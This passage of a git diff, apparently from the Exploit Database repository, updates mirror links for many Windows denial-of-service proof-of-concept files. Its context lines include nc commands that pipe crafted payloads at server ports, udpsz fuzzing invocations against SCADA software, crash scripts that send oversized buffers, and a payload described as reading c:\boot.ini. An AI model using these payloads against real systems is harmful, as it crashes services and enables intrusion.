+https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 3 SERVER @@ -339,7 +339,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 4 SERVER @@ -388,7 +388,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 5 SERVER @@ -437,7 +437,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 6 SERVER @@ -486,7 +486,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 7 SERVER @@ -529,7 +529,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 8 SERVER @@ -574,7 +574,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 9 SERVER @@ -625,7 +625,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 10 SERVER @@ -673,7 +673,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 11 SERVER @@ -718,7 +718,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 12 SERVER diff --git a/exploits/windows/dos/17025.txt b/exploits/windows/dos/17025.txt index bbdb5f9c3..ef18181d2 100644 --- a/exploits/windows/dos/17025.txt +++ b/exploits/windows/dos/17025.txt @@ -7,8 +7,8 @@ http://aluigi.org/adv/realwin_6-adv.txt http://aluigi.org/adv/realwin_7-adv.txt http://aluigi.org/adv/realwin_8-adv.txt -Advisory Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-adv.tar.gz (datac_realwin_adv.tar.gz) -PoC Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-poc.tar.tz (datac_realwin_poc.tar.gz) +Advisory Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-adv.tar.gz (datac_realwin_adv.tar.gz) +PoC Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-poc.tar.tz (datac_realwin_poc.tar.gz) ####################################################################### @@ -54,7 +54,7 @@ The Code =========== http://aluigi.org/poc/realwin_2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-2.zip (realwin_2.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-2.zip (realwin_2.zip) nc SERVER 910 < realwin_2.dat @@ -89,7 +89,7 @@ The Code =========== http://aluigi.org/poc/realwin_3.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-3.zip (realwin_3.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-3.zip (realwin_3.zip) nc SERVER 910 < realwin_3?.dat @@ -113,7 +113,7 @@ The Code =========== http://aluigi.org/poc/realwin_4.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-4.zip (realwin_4.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-4.zip (realwin_4.zip) nc SERVER 910 < realwin_4.dat @@ -151,7 +151,7 @@ The Code =========== http://aluigi.org/poc/realwin_5.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-5.zip (realwin_5.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-5.zip (realwin_5.zip) nc SERVER 910 < realwin_5?.dat @@ -186,7 +186,7 @@ The Code =========== http://aluigi.org/poc/realwin_6.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-6.zip (realwin_6.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-6.zip (realwin_6.zip) nc SERVER 910 < realwin_6?.dat @@ -227,7 +227,7 @@ The Code =========== http://aluigi.org/poc/realwin_7.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-7.zip (realwin_7.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-7.zip (realwin_7.zip) nc SERVER 910 < realwin_7?.dat @@ -251,7 +251,7 @@ The Code =========== http://aluigi.org/poc/realwin_8.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-8.zip (realwin_8.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-8.zip (realwin_8.zip) nc SERVER 910 < realwin_8.dat diff --git a/exploits/windows/dos/17032.txt b/exploits/windows/dos/17032.txt index bb6429c3a..8af8bd8fe 100644 --- a/exploits/windows/dos/17032.txt +++ b/exploits/windows/dos/17032.txt @@ -62,4 +62,4 @@ Exception was not handled by user's code, so application was forced to close 78138A19 Main PUSH C000000D ; ESP=0012E4D8 78138A1E Main CALL DWORD PTR DS:[<&KERNEL32.GetCurrentProcess>]; FL=PS, EAX=FFFFFFFF 78138A24 Main PUSH EAX ; ESP=0012E4D4 -78138A25 Main CALL DWORD PTR DS:[<&KERNEL32.TerminateProcess>]; FL=P, EAX=00000000, ECX=0039B9B8, EBX=00000000, ESP=022AFF70, +78138A25 Main CALL DWORD PTR DS:[<&KERNEL32.TerminateProcess>]; FL=P, EAX=00000000, ECX=0039B9B8, EBX=00000000, ESP=022AFF70, \ No newline at end of file diff --git a/exploits/windows/dos/17045.py b/exploits/windows/dos/17045.py index 60f0c0ff7..26e2324b9 100755 --- a/exploits/windows/dos/17045.py +++ b/exploits/windows/dos/17045.py @@ -20,4 +20,4 @@ crash = "A" * 2000 print "Sending crash...." pwned = "\x00\x02" + "A" + "\x00" + crash + "\x00" -s.sendto(pwned, (host, port)) +s.sendto(pwned, (host, port)) \ No newline at end of file diff --git a/exploits/windows/dos/17071.py b/exploits/windows/dos/17071.py index 9a27b026f..0c7c82f65 100755 --- a/exploits/windows/dos/17071.py +++ b/exploits/windows/dos/17071.py @@ -18,6 +18,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Play this file with GOM Player 2.1.28.5039 and enjoy ;)" - - +print "Play this file with GOM Player 2.1.28.5039 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/17074.py b/exploits/windows/dos/17074.py index 8640a1a60..733973f3c 100755 --- a/exploits/windows/dos/17074.py +++ b/exploits/windows/dos/17074.py @@ -35,6 +35,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Play this file with Winamp 5.61 and enjoy ;)" - - +print "Play this file with Winamp 5.61 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/17075.py b/exploits/windows/dos/17075.py index ad9662baa..e0c6615e9 100755 --- a/exploits/windows/dos/17075.py +++ b/exploits/windows/dos/17075.py @@ -28,6 +28,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Play this file with Media Player Classic - Home Cinema 1.5.0.2827 and enjoy ;)" - - +print "Play this file with Media Player Classic - Home Cinema 1.5.0.2827 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/1708.txt b/exploits/windows/dos/1708.txt index 490bd658e..b6b4cf023 100644 --- a/exploits/windows/dos/1708.txt +++ b/exploits/windows/dos/1708.txt @@ -16,6 +16,6 @@ Author: Luigi Auriemma ####################################################################### -Backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1708.zip (04232006-skulltagfs.zip) +Backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1708.zip (04232006-skulltagfs.zip) # milw0rm.com [2006-04-23] \ No newline at end of file diff --git a/exploits/windows/dos/17142.py b/exploits/windows/dos/17142.py index f6e0a26d2..fdcad6667 100755 --- a/exploits/windows/dos/17142.py +++ b/exploits/windows/dos/17142.py @@ -39,6 +39,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Open this file in IrfanView 4.28 and enjoy ;)" - - +print "Open this file in IrfanView 4.28 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/17143.py b/exploits/windows/dos/17143.py index 274449540..1fc9b9e25 100755 --- a/exploits/windows/dos/17143.py +++ b/exploits/windows/dos/17143.py @@ -39,6 +39,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Open this file in IrfanView 4.28 and enjoy ;)" - - +print "Open this file in IrfanView 4.28 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/17159.txt b/exploits/windows/dos/17159.txt index 6031ba6be..7985b1fd3 100644 --- a/exploits/windows/dos/17159.txt +++ b/exploits/windows/dos/17159.txt @@ -202,7 +202,7 @@ K (maybe)] http://aluigi.org/poc/snabase_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17159.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17159.zip A] nc SERVER PORT < snabase_1a.dat diff --git a/exploits/windows/dos/17160.txt b/exploits/windows/dos/17160.txt index e6980a18c..b0b8180e9 100644 --- a/exploits/windows/dos/17160.txt +++ b/exploits/windows/dos/17160.txt @@ -143,7 +143,7 @@ vulnerabilities reported in this software. http://aluigi.org/poc/msreader_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17160.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17160.zip ####################################################################### diff --git a/exploits/windows/dos/17161.txt b/exploits/windows/dos/17161.txt index 28959849d..68f17cfe4 100644 --- a/exploits/windows/dos/17161.txt +++ b/exploits/windows/dos/17161.txt @@ -124,7 +124,7 @@ Modified bytes for msreader_2b.lit: http://aluigi.org/poc/msreader_2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17161.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17161.zip ####################################################################### diff --git a/exploits/windows/dos/17162.txt b/exploits/windows/dos/17162.txt index 0d4052e8f..6326634bd 100644 --- a/exploits/windows/dos/17162.txt +++ b/exploits/windows/dos/17162.txt @@ -141,7 +141,7 @@ sequence of 'A's. http://aluigi.org/poc/msreader_3.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17162.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17162.zip ####################################################################### diff --git a/exploits/windows/dos/17163.txt b/exploits/windows/dos/17163.txt index 363a2eded..d2d3f1d7a 100644 --- a/exploits/windows/dos/17163.txt +++ b/exploits/windows/dos/17163.txt @@ -101,7 +101,7 @@ Modified bytes in the proof-of-concept: http://aluigi.org/poc/msreader_4.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17163.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17163.zip ####################################################################### diff --git a/exploits/windows/dos/17164.txt b/exploits/windows/dos/17164.txt index e514d63da..d7c33df55 100644 --- a/exploits/windows/dos/17164.txt +++ b/exploits/windows/dos/17164.txt @@ -100,7 +100,7 @@ Modified bytes in the proof-of-concept: http://aluigi.org/poc/msreader_5.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17164.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17164.zip ####################################################################### diff --git a/exploits/windows/dos/17274.txt b/exploits/windows/dos/17274.txt index 713e6aad7..7360635ba 100644 --- a/exploits/windows/dos/17274.txt +++ b/exploits/windows/dos/17274.txt @@ -119,4 +119,4 @@ SlimPDF_Reader+0x00000000000419c4 (Hash=0x566e1f14.0x18331e13) User mode write access violations that are not near NULL are exploitable. -POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17274.poc.tar.gz \ No newline at end of file +POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17274.poc.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/17287.mid b/exploits/windows/dos/17287.mid index d5dfb6348..4fb43d0dc 100644 --- a/exploits/windows/dos/17287.mid +++ b/exploits/windows/dos/17287.mid @@ -177,4 +177,4 @@ VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVQ== -POC Available: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17287.poc.mid \ No newline at end of file +POC Available: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17287.poc.mid \ No newline at end of file diff --git a/exploits/windows/dos/17398.txt b/exploits/windows/dos/17398.txt index 33f9d4e4f..f33f7b0a2 100644 --- a/exploits/windows/dos/17398.txt +++ b/exploits/windows/dos/17398.txt @@ -15,7 +15,7 @@ playlist and the media player will try to generate thumbnail image of the contents. File at: http://www.deventum.com/research/Crash_WMplayer.3gp -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17398.3gp (Crash_WMplayer.3gp) +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17398.3gp (Crash_WMplayer.3gp) Debug info, diff --git a/exploits/windows/dos/17399.txt b/exploits/windows/dos/17399.txt index b992b75cd..b8e3a6ed2 100644 --- a/exploits/windows/dos/17399.txt +++ b/exploits/windows/dos/17399.txt @@ -85,5 +85,5 @@ winword!wdGetApplicationObject+0x150fac: 4) POC =========== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17399.doc (PRL-2011-07.doc) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17399.doc (PRL-2011-07.doc) http://www.protekresearchlab.com/exploits/PRL-2011-07.doc \ No newline at end of file diff --git a/exploits/windows/dos/17405.txt b/exploits/windows/dos/17405.txt index 82d535ab4..a0cb4a3ec 100644 --- a/exploits/windows/dos/17405.txt +++ b/exploits/windows/dos/17405.txt @@ -25,4 +25,4 @@ The following JS was the problem point inside the PDF file (Open the PoC file by dirty; // Important! /*****************************************************************************/ -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17405.pdf \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17405.pdf \ No newline at end of file diff --git a/exploits/windows/dos/17421.py b/exploits/windows/dos/17421.py index dd03279af..2b6263bd0 100755 --- a/exploits/windows/dos/17421.py +++ b/exploits/windows/dos/17421.py @@ -44,4 +44,4 @@ f.write(poc) f.close() print "Done, 2nd file generated on 'C:\\' ..." -print "Open this file in XnView 1.98 and enjoy ;)" +print "Open this file in XnView 1.98 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/17497.txt b/exploits/windows/dos/17497.txt index cfc4faa0a..8e66858f8 100644 --- a/exploits/windows/dos/17497.txt +++ b/exploits/windows/dos/17497.txt @@ -43,4 +43,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5023.php PoC: - http://www.zeroscience.mk/codes/alplayer_bof.rar - - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17497.rar (alplayer_bof.rar) \ No newline at end of file + - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17497.rar (alplayer_bof.rar) \ No newline at end of file diff --git a/exploits/windows/dos/17544.txt b/exploits/windows/dos/17544.txt index 5bbed7b96..ef647b1a6 100644 --- a/exploits/windows/dos/17544.txt +++ b/exploits/windows/dos/17544.txt @@ -166,4 +166,4 @@ corruptions using a standalone file. . feel free to contact us at : info [at] abysssec.com PoC link : http://abysssec.com/files/GDI_PoC.zip -PoC Mirror : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17544.zip (GDI_PoC.zip) \ No newline at end of file +PoC Mirror : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17544.zip (GDI_PoC.zip) \ No newline at end of file diff --git a/exploits/windows/dos/17712.txt b/exploits/windows/dos/17712.txt index 8311be3a6..5cf658d8a 100644 --- a/exploits/windows/dos/17712.txt +++ b/exploits/windows/dos/17712.txt @@ -79,4 +79,4 @@ the memory is corrupted and arbitrary code can be run on the remote host. =========== http://www.protekresearchlab.com/exploits/PRL-2011-08.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17712.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17712.zip \ No newline at end of file diff --git a/exploits/windows/dos/17772.txt b/exploits/windows/dos/17772.txt index 871c8fba3..4249f2e06 100644 --- a/exploits/windows/dos/17772.txt +++ b/exploits/windows/dos/17772.txt @@ -69,7 +69,7 @@ fwrite(). http://aluigi.org/poc/bwocxrun_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17772.zip (bwocxrun_1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17772.zip (bwocxrun_1.zip) ####################################################################### diff --git a/exploits/windows/dos/17795.py b/exploits/windows/dos/17795.py index d2d6c4c10..44016e10b 100755 --- a/exploits/windows/dos/17795.py +++ b/exploits/windows/dos/17795.py @@ -44,6 +44,4 @@ print (r) s.send(cmd + " " + data1 + data2 + '\r\n') print ("Payload Send!\n") print ("2 or 3 seconds before the blue screen of the death...") -s.close() - - +s.close() \ No newline at end of file diff --git a/exploits/windows/dos/1781.txt b/exploits/windows/dos/1781.txt index ecde19d33..393a7413f 100644 --- a/exploits/windows/dos/1781.txt +++ b/exploits/windows/dos/1781.txt @@ -1,5 +1,5 @@ # Outgun <= 1.0.3 bot 2 Multiple Remote Vulnerabilities Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1781.zip (05132006-outgunx.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1781.zip (05132006-outgunx.zip) # milw0rm.com [2006-05-14] \ No newline at end of file diff --git a/exploits/windows/dos/1782.txt b/exploits/windows/dos/1782.txt index 999854928..00c47b475 100644 --- a/exploits/windows/dos/1782.txt +++ b/exploits/windows/dos/1782.txt @@ -1,5 +1,5 @@ # Empire <= 4.3.2 (strncat) Denial of Service Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1782.zip (05132006-empiredos.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1782.zip (05132006-empiredos.zip) # milw0rm.com [2006-05-14] \ No newline at end of file diff --git a/exploits/windows/dos/1783.txt b/exploits/windows/dos/1783.txt index c536de306..899b9c034 100644 --- a/exploits/windows/dos/1783.txt +++ b/exploits/windows/dos/1783.txt @@ -1,5 +1,5 @@ # Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1783.zip (05132006-genecysbof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1783.zip (05132006-genecysbof.zip) # milw0rm.com [2006-05-14] \ No newline at end of file diff --git a/exploits/windows/dos/17830.txt b/exploits/windows/dos/17830.txt index b2661f8c1..3e4a3a5df 100644 --- a/exploits/windows/dos/17830.txt +++ b/exploits/windows/dos/17830.txt @@ -208,7 +208,7 @@ flow and executing code under SYSTEM privileges. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17830.zip (udpsz.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17830.zip (udpsz.zip) udpsz -C 00140004 -b a -l 0 -T 0xffffffff SERVER 42 0x140008 diff --git a/exploits/windows/dos/17835.txt b/exploits/windows/dos/17835.txt index 8f6720215..2482a7848 100644 --- a/exploits/windows/dos/17835.txt +++ b/exploits/windows/dos/17835.txt @@ -54,7 +54,7 @@ Denial of Service caused by an invalid read access. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17835.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17835.zip udpsz -C "03 66 14 71 00 00 00 00 06 00 00 00 0a ff ff 02 01 01 10 27" -b 0xff SERVER 48899 0x5fe diff --git a/exploits/windows/dos/17836.txt b/exploits/windows/dos/17836.txt index 91b6161bf..12110dea7 100644 --- a/exploits/windows/dos/17836.txt +++ b/exploits/windows/dos/17836.txt @@ -68,7 +68,7 @@ Modified bytes: http://aluigi.org/poc/metastock_1.mwl -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17836.mwl +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17836.mwl ####################################################################### diff --git a/exploits/windows/dos/17837.txt b/exploits/windows/dos/17837.txt index 1c583fb66..3f8bd2c41 100644 --- a/exploits/windows/dos/17837.txt +++ b/exploits/windows/dos/17837.txt @@ -87,7 +87,7 @@ or http://aluigi.org/poc/esignal_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17837.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17837.zip ####################################################################### diff --git a/exploits/windows/dos/17838.txt b/exploits/windows/dos/17838.txt index 004d9fd77..8aaa31f2b 100644 --- a/exploits/windows/dos/17838.txt +++ b/exploits/windows/dos/17838.txt @@ -64,7 +64,7 @@ exploitable through the "domain", "report_domain", "register_datahub", http://aluigi.org/poc/cogent_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17838.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17838.dat nc SERVER 4052 < cogent_1.dat diff --git a/exploits/windows/dos/17839.txt b/exploits/windows/dos/17839.txt index 66295a126..9eb413fdb 100644 --- a/exploits/windows/dos/17839.txt +++ b/exploits/windows/dos/17839.txt @@ -55,7 +55,7 @@ field (-1 or 4294967295) plus one resulting in a buffer of zero bytes. http://aluigi.org/poc/cogent_3.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17839.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17839.dat nc SERVER 80 < cogent_3.dat diff --git a/exploits/windows/dos/1784.txt b/exploits/windows/dos/1784.txt index 2b8770f43..5b8c4122e 100644 --- a/exploits/windows/dos/1784.txt +++ b/exploits/windows/dos/1784.txt @@ -1,3 +1,3 @@ # Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1784.zip (05132006-raydiumx.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1784.zip (05132006-raydiumx.zip) \ No newline at end of file diff --git a/exploits/windows/dos/17841.txt b/exploits/windows/dos/17841.txt index 2380ea204..f8a5ef081 100644 --- a/exploits/windows/dos/17841.txt +++ b/exploits/windows/dos/17841.txt @@ -73,7 +73,7 @@ malicious code: http://aluigi.org/poc/daqfactory_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17841.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17841.dat nc SERVER 20034 -u < daqfactory_1.dat diff --git a/exploits/windows/dos/17842.txt b/exploits/windows/dos/17842.txt index b3eab8b08..8ff154344 100644 --- a/exploits/windows/dos/17842.txt +++ b/exploits/windows/dos/17842.txt @@ -56,7 +56,7 @@ through "memcpy(heap_buffer, input, content_length_size)". http://aluigi.org/poc/movicon_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17842-1.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17842-1.dat nc SERVER 808 < movicon_1.dat @@ -83,7 +83,7 @@ buffer of 8192 bytes for containing the incoming HTTP requests. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17842-2.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17842-2.dat udpsz -T -b 0x61 SERVER 808 10000 @@ -117,7 +117,7 @@ environments. http://aluigi.org/poc/movicon_3.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17842-3.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17842-3.dat nc SERVER 808 < movicon_3.dat diff --git a/exploits/windows/dos/17843.txt b/exploits/windows/dos/17843.txt index 1f6f9cdce..0e1b00ffc 100644 --- a/exploits/windows/dos/17843.txt +++ b/exploits/windows/dos/17843.txt @@ -58,7 +58,7 @@ overflow and invalid read access. http://aluigi.org/poc/rslogix_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17843.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17843.zip nc SERVER 4446 < rslogix_1a.dat nc SERVER 4446 < rslogix_1b.dat diff --git a/exploits/windows/dos/17844.txt b/exploits/windows/dos/17844.txt index 95eea58a2..08552e6a8 100644 --- a/exploits/windows/dos/17844.txt +++ b/exploits/windows/dos/17844.txt @@ -126,7 +126,7 @@ for executing any desired custom command. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17844-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17844-1.zip only a simple scanner: udpsz -d 2 -c "xx%" -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000 @@ -134,7 +134,7 @@ only a simple scanner: udpsz -d 2 -c "xx%test," -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000 http://aluigi.org/poc/scadapro_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17844-2.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17844-2.zip nc SERVER 11234 < scadapro_1b.dat ; read c:\boot.ini nc SERVER 11234 < scadapro_1c.dat ; create c:\evil_file.txt diff --git a/exploits/windows/dos/17878.txt b/exploits/windows/dos/17878.txt index bf89b2480..d4f3bfbd2 100644 --- a/exploits/windows/dos/17878.txt +++ b/exploits/windows/dos/17878.txt @@ -118,7 +118,7 @@ comparison. http://aluigi.org/poc/eviews_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17878.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17878.zip ####################################################################### diff --git a/exploits/windows/dos/17879.txt b/exploits/windows/dos/17879.txt index b6a49f9ef..91913f75c 100644 --- a/exploits/windows/dos/17879.txt +++ b/exploits/windows/dos/17879.txt @@ -71,7 +71,7 @@ Various invalid memory accesses and freezing of the program. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17879.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17879.zip A] udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff diff --git a/exploits/windows/dos/17885.txt b/exploits/windows/dos/17885.txt index acbe810ce..80284ae71 100644 --- 